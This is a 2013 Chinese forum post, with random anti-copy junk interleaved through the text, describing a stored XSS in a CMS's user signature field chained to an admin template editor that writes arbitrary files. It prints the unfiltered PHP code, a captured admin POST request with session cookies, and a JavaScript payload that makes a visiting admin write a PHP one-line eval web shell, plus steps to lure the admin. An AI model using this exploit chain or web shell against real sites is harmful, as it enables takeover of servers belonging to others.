|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题5 K, V s6 T+ h* A8 g' A
官网已经修补了,所以重新下了源码
' ~$ c' ^7 @. o因为 后台登入 还需要认证码 所以 注入就没看了。
3 u1 P% s+ Y$ F5 @# V5 P% t存在 xss! q+ X U2 b: @& N2 j# V# S
漏洞文件 user/member/skin_edit.php7 s) h) f8 \ v1 ]+ I# @
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:: g, P, y! c( Q
) i) i) e/ h1 g& C s# T
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?># \+ ]$ ]5 [1 V9 l7 H
. y, o, ^# J/ Q6 c</textarea></td></tr>
, j' a, M4 w/ }1 s& g! f* p# C / y8 M1 {: D; \; H
user/do.php 4 q" T. h) m0 M
! h, v- ~ N9 F5 e9 |; n% h; F$ \6 P/ S6 s
* `4 ^' c; R% f
if($op=='zl'){ //资料+ b3 H s8 t4 O/ S" Q( Q+ b
" z* z; m: t9 ]4 L0 [ if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
! s) ~6 D; V3 s: \ exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
, M) c. n2 L6 l. h " B" B; k( k# e
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
# [/ S& T& |7 Z G0 i9 X' e 3 ]3 F/ a3 @2 `0 J: q2 Q4 u
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'. w$ |0 n3 Z4 `8 N
where CS_Name='".$cscms_name."'";$ a# q3 B, B" s% D2 m6 n f! j
+ {$ ?/ e/ g3 O* z if($db->query($sql)){
2 a3 x0 J' t! K 2 `1 i% K2 x q: {+ b4 E
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));1 m1 z- l$ g2 @. `. ^
7 O) \% b% _# h2 l) T }else{
( c" t# A& G" X1 H3 i
O: Y& E7 }6 F exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
) _% }. ]* |% T- c- a( i
; w, A: d Q* I }! M8 e6 O' c1 w7 g
* j/ s9 M- f: G; s! e
& j- D7 ^8 n- I0 @ L, e
没有 过滤导致xss产生。: w7 J, j3 m# M0 [+ `: B; U
后台 看了下 很奇葩的是可以写任意格式文件。。
: T3 M; J `1 R抓包。。2 Y3 O6 o1 g! ~
4 N' w5 p1 G, [% O
7 B# E% w% `- }1 I* m9 F本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1 s) A3 S/ M- K, K3 K
0 b3 x' l( K8 ?$ K4 W
Accept: text/html, application/xhtml+xml, */*% J" C: C3 P* b+ @* b" e6 d% r
8 d! D9 `3 }- pReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
8 c$ y2 t7 D% m9 \
4 m+ s" V& U' B2 bAccept-Language: zh-CN) K r, _6 T( V
# W$ q* a; }7 w+ n2 x) z+ p
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
$ t) A) P K' F- k+ E$ o" F3 P 3 \; B' T: m! u2 f' x
Content-Type: application/x-www-form-urlencoded
2 a0 S& W8 k. b, o% O% V
$ G3 l* g+ r( u" q0 FAccept-Encoding: gzip, deflate/ @# u& W' _: e' U. L u
6 @$ V1 y) w' O* z7 pHost: 127.0.0.1
* g% n; O1 Q5 m a/ `4 t: _
9 H2 U( t: R* jContent-Length: 38
3 `3 d! x) G0 Q( h+ ]4 {
! l8 F0 B4 \4 X3 j- ]DNT: 1
3 w; Q4 C2 ~' u3 G4 `7 [% Y
l- i, \+ ?* ?Connection: Keep-Alive
( o, {' G% n4 b. m" e' |/ Z. s / [1 ^1 G" l4 j$ @
Cache-Control: no-cache, \, q" b: \2 X/ \# ~0 C
' G6 L4 \+ v; {+ {! [2 p2 D4 FCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
9 ~! L3 J( G! o3 P ; P |. u$ d. D) x6 b
2 H8 C9 o2 e9 [* H4 I% ^name=aaa.php&content=%3Cs%3E%3Ca%25%3E
! a/ M( u% o/ D+ `
% u: }. e$ _$ t. y% w! `! M/ m6 |8 `, a
1 I+ |: u6 g! }" U6 [2 g! i于是 构造js如下。' p3 U2 u f4 z4 X. `8 P- N
* r3 ]4 x5 H: O ^# {( u
本帖隐藏的内容<script>
9 I, L: X8 E7 L, H( u% gthisTHost = top.location.hostname;
# Y! ~4 x b+ A
, S$ w2 |/ S$ w: F* s/ HthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/"; L& ^1 v+ T0 @0 X4 z# R
" A4 L7 A$ L/ q3 M# e K. f* ifunction PostSubmit(url, data, msg) { ( ~3 v# W" ? h0 P' Y6 E, r, D
var postUrl = url;
" N& O5 R1 r" @2 }' l8 J. t4 r 2 W9 t6 l# ~' K% A) @
var postData = data; Z/ r3 w/ n9 R" V! h. t/ |& R, O
var msgData = msg; , }3 D% `0 ]- ]3 y/ g, H
var ExportForm = document.createElement("FORM"); 5 r/ Q9 S. n) W( e
document.body.appendChild(ExportForm); 3 ~# L# C& U) a6 ]# Q
ExportForm.method = "POST";
* t8 i5 b: [$ L var newElement = document.createElement("input"); ; @. G" ?7 a1 E/ g4 V
newElement.setAttribute("name", "name"); ) z3 |8 z, I! d+ v
newElement.setAttribute("type", "hidden");
0 f/ A) I/ Q/ Q: F var newElement2 = document.createElement("input"); 4 d" G* i8 b; u3 t- N9 P, j W4 A" Q
newElement2.setAttribute("name", "content"); 3 T% f- H" T3 C) u9 F- d; @
newElement2.setAttribute("type", "hidden"); - j$ [2 i9 H L9 w' H2 u
ExportForm.appendChild(newElement); A" B- ~& P8 _- j/ N
ExportForm.appendChild(newElement2); 8 [5 p- w! P- {* N7 |9 O
newElement.value = postData; # b, G+ @; K1 Q, ?
newElement2.value = msgData; 1 O, l) q: Y, E7 N( w" Y9 z& r
ExportForm.action = postUrl;
0 |' s7 `0 }1 g7 l ExportForm.submit(); 5 c9 I2 @$ E$ p2 `4 w$ L
};& k+ M6 q! e4 n7 M3 ]! x
8 T* Y4 X0 p+ F6 V7 [
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
3 u/ F1 {! v$ o% E3 L3 M; C9 E 0 j3 m4 h7 M- o$ |# p7 A
</script>
+ m- }" u8 L2 C, n$ B3 P2 I; A! _
( P/ }) b8 X7 ]% z2 w+ j$ \( |; V
4 I" M" w$ T. T' Q2 D- `http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入- N# D. L2 H3 c0 @- k* w
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
5 w9 X! A" d" L% l就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
2 q7 {* O- t/ d; H p1 g: U+ ` |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对